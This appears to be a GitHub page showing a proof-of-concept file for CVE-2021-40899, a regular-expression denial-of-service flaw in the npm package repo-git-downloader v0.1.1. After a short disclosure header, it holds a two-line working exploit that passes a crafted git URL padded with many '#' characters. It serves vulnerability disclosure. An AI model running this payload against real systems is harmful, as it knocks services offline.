Headline
CVE-2021-40899: SaveResults/repo-git-downloader.js at main · yetingli/SaveResults
A Regular Expression Denial of Service (ReDOS) vulnerability was discovered in repo-git-downloader v0.1.1 when downloading crafted invalid git repositories.
Permalink
Cannot retrieve contributors at this time
/**
* repo-git-downloader@0.1.1
* Package Manager: npm
* Link to published package: https://github.com/mnichangxin/repo-git-downloader
* Link to GitHub repo: https://github.com/mnichangxin/repo-git-downloader
* Severity level: High
* Module Description: A tool to download git repository
* Additional Info: It allows cause a denial of service when downloading crafted invalid git repositories.
* Contacted maintainer?: No
* Open issue?: No
*/
var download = require(“repo-git-downloader”)
download(‘git@github.com:–/--#################################################################################################################################################################!’)